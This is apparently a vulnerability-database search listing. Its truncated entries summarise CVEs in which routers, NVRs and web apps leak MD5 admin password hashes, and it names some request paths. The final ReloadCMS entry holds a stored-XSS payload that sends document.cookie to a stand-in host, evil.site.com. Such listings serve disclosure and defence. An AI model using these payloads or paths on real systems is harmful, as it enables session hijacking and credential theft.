26 matches found
Geutebrueck re_porter 7.8.974.20 - Credential Disclosure Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Geutebrueck reporter 7.8.974.20 - Credential Disclosure Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version:...
CVE-2017-14262
On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and login to the device with that hash in the szUserPasswd parameter...
CVE-2017-14262
CVE-2017-14262 affects Samsung NVR devices. Remote attackers can read the MD5 hash of the admin password via szUserName JSON data sent to cgi-bin/main-cgi and then use that hash in szUserPasswd to log in. The vulnerability is network-exposed with high impact (confidentiality/integrity/availabilit...
CVE-2014-8243
Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remot...
Design/Logic Flaw
Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remot...
CVE-2014-8243
Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remot...
CVE-2014-8243
CVE-2014-8243 affects Linksys SMART Wi‑Fi firmware on EA2700/EA3500 and other models; a remote, unauthenticated attacker can read the administrator’s MD5 password hash by requesting /.htpasswd. Affected firmware versions include 2.1.41/1.1.41/1.1.40/1.1.42 build variants across E4200v2, EA4500, E...
nodez <= 4.6.1.1 mercury Multiple Vulnerabilities
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo Nodez 4.6.1.1 Mercury possibly prior versions multiple vulnerabilities\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n\r\n; / software: site: nodez.greentinted.com/ description:...
ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit
No description provided by source. ----------------------------Information------------------------------------------------ +Name :ilchClan = 1.0.5B SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +email : [email protected] +Date : 15.04.2010 +Script : ilchClan = 1.0.5B...
Cross site request forgery (csrf)
Davlin Thickbox Gallery 2 allows remote attackers to obtain the administrative username and MD5 password hash via a direct request to conf/admins.php...
CVE-2008-3859
Davlin Thickbox Gallery 2 allows remote attackers to obtain the administrative username and MD5 password hash via a direct request to conf/admins.php...
Default credentials
ZyXEL Prestige routers, including P-660, P-661, and P-662 models with firmware 3.40PE9 and 3.40AGD.2 through 3.40AHQ.3, do not use a salt when calculating an MD5 password hash, which makes it easier for attackers to crack passwords...
CVE-2007-5919
MyWebFTP, possibly 5.3.2, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain an MD5 password hash via a direct request for pass/pass.txt...
Improper access control
MyWebFTP, possibly 5.3.2, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain an MD5 password hash via a direct request for pass/pass.txt...
CVE-2007-5919
The CVE-2007-5919 entry concerns MyWebFTP (likely version 5.3.2) where sensitive data is stored under the web root with weak access controls, enabling remote retrieval of an MD5 password hash by directly requesting pass/pass.txt. This vulnerability is described across multiple sources (NVD, CVE l...
Improper access control
CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php...
CVE-2007-4937
CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php...
CVE-2007-4937
CVE-2007-4937 affects CS Guestbook. The vulnerability arises from insufficient access control that allows remote attackers to retrieve sensitive data (admin name and MD5 password hash) by directly requesting base/usr/0.php. The description in connected sources confirms the issue but does not prov...
CVE-2007-4937
CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php...
ReloadCMS-1.2.5.txt
nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...